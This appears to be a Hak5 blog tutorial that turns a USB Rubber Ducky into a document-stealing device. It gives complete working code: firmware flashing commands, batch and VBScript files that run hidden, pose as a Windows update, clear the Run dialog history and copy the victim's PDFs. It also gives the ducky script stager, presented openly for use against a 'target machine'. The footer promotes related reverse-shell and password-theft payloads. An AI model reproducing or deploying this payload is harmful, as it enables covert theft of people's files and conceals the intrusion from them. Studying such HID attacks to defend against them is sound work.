Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained

Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained

As a keystroke injection attack tool capable of mimicking both a USB keyboard and mass storage, the USB Rubber Ducky excels at autonomously exfiltrating documents – or what we like to call performing an involuntary backup. In this article I will briefly outline the steps necessary to turn your USB Rubber Ducky into a document exfiltration machine, as described on Hak5 episodes 2112, 2113 and 2114.

What the Duck?

If you’re new to the USB Rubber Ducky, it is the original keystroke injection attack tool. That means while it looks like a USB Drive, it acts like a keyboard – typing over 1000 words per minute. Specially crafted payloads like these mimic a trusted user, entering keystrokes into the computer at superhuman speed. Once developed, anyone with social engineering or physical access skills can deploy these payloads with ease. Since computers trust humans, and inherently keyboards, computers trust the USB Rubber Ducky. So let’s go violate this trust…

You will need

Flash your USB Rubber Ducky to the “Twin Duck” firmware

Either using the dfu-programmer command and c_duck_v2.1.hex manually, or the ducky-flasher tool, flash the USB Rubber Ducky with this “Twin Duck” firmware from Midnightsnake to enable both USB HID Keyboard and USB Mass Storage. Begin by firmly holding down the micro push button on the USB Rubber Ducky while plugging it into your Linux computer and keep it held for around 5 seconds after connection. Then either run the ducky-flasher tool and follow the wizard, or use the dfu-programmer to manually erase, flash and reset the device.

sudo dfu-programmer at32uc3b1256 erase
sudo dfu-programmer at32uc3b1256 flash --suppress-bootloader-mem c_duck_v2.1.hex
sudo dfu-programmer at32uc3b1256 reset

Rename the Micro SD card volume label to “_”

Using gparted or Windows explorer, rename the USB Rubber Ducky’s Micro SD card volume label to “_” (sans quotes). This will save characters and thus make our our stager payload faster. The easiest way to rename the volume label is from Windows Explorer. From “My Computer” select the drive and press F2. Type _ and press enter. Done.

Copy the staged payload to the root of the newly renamed Micro SD card

You’ll need 3 files and 1 directory — d.cmd, e.cmd, i.vbs and a “slurp” directory. Our stager will execute d.cmd from the root of the drive with the volume name “_”. In this case d.cmd will invisibly execute e.cmd using the i.vbs.

 

d.cmd

@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~d0\i.vbs %~d0\e.cmd
@exit

 

e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

 

i.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

 

Finally create the slurp directory on the root of the Micro SD card labeled "_"

Encode the stager payload

Now that the firmware is flashed and the staged files are in place, we’re ready to setup the stager. This will be a very quickly executing ducky script which calls the files on the Mass Storage drive in order to copy files from the users Documents folder.

REM USB Exfiltration Payload from Hak5 episodes 2112 - 2114
REM Target: Windows XP SP3+ Author: Hak5Darren Props: Diggster, Midnightsnake
DELAY 1000
GUI r
DELAY 100
STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')"
ENTER

 

Save this as a standard ASCII text file ready to be encoded by any number of the Ducky Script Encoders, such as the command line Java encoder, the GUI Java encoder, the command line Python encoder/decoder or the Online Ducky Script Encoder.

Finally copy the resulting inject.bin file to the root of the Micro SD card. You should now have 4 files and 1 directory on the root — inject.bin, d.cmd, e.cmd, i.vbs and the slurp directory.

That’s it! Plug the newly configured USB Rubber Ducky with the Exfiltration payload into the target machine and in seconds it will begin invisibly copying files from the user’s Documents directory. Of course all of this can be customized and configured by altering the cmd files on the root of the Micro SD card. By default PDF files will be copied to the slurp directory in a new directory named after the hostname and US date and time stamp. Enojoy!

What next?

Now that you’ve created a USB Rubber Ducky capable of exfiltrating documents, perhaps you’d like to check out some other popular payloads – like the 3 Second Reverse Shell with a USB Rubber Ducky, or Pilfering Passwords with the USB Rubber Ducky – a 15 Second Password Hack, Mr Robot Style. Now go forth a duck ’em!




Leave a comment

Comments will be approved before showing up.


Also in Blog

What is the best security awareness payload for the Rubber Ducky?
What is the best security awareness payload for the Rubber Ducky?

A two second HID attack against Windows and Mac that launches the website of your choosing. That's by far the most effective security awareness payload for the USB Rubber Ducky.

Cyber security awareness building is important, and developing an effective security awareness program - or at least raising eyebrows that one is even necessary - doesn't need to be difficult.

Continue Reading

The 3 Second Reverse Shell with a USB Rubber Ducky
The 3 Second Reverse Shell with a USB Rubber Ducky

In this tutorial we’ll be setting up a Reverse Shell payload on the USB Rubber Ducky that’ll execute in just 3 seconds.

A reverse shell is a type of shell where the victim computer calls back to an attacker’s computer. The attacking computer typically listens on a specific port. When it receives the connection it is then able to execute commands on the victim computer. In essence it’s remote control of a computer.

Continue Reading

What's the quickest way to steal a Windows password hash?
What's the quickest way to steal a Windows password hash?

Using a USB Rubber Ducky and this simple payload, Windows password hashes can be captured for cracking in less than two seconds.

This technique works against almost all versions of Microsoft Windows and only requires a 5 line Ducky Script and an open source server setup on the target network.

Continue Reading